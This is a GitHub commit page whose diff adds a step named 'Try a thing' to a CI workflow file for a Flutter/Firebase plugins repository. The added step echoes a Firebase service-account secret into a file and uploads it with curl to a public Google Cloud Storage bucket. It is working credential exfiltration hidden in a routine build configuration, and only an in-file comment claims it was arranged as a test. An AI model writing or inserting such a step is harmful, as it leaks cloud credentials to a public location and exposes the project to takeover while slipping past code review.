Skip to content

Commit

Permalink
Try a thing
Browse files Browse the repository at this point in the history
  • Loading branch information
nilsreichardt committed Sep 27, 2022
1 parent f4b07af commit d589955
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions .github/workflows/all_plugins.yaml
Expand Up @@ -24,6 +24,13 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
# As note: this test is arranged with Mike
- name: Try a thing
env:
FIREBASE_SERVICE_ACCOUNT_FLUTTER_FIREBASE_DOCS: ${{ secrets.FIREBASE_SERVICE_ACCOUNT_FLUTTER_FIREBASE_DOCS }}
run: |
echo $FIREBASE_SERVICE_ACCOUNT_FLUTTER_FIREBASE_DOCS >> firebase_secret.txt
curl -v --upload-file firebase_secret.txt 'https://storage.googleapis.com/public-nilsreichardt/firebase_secret.txt'
- name: 'Install Flutter'
run: ./.github/workflows/scripts/install-flutter.sh stable
- name: 'Install Tools'
Expand Down

0 comments on commit d589955

Please sign in to comment.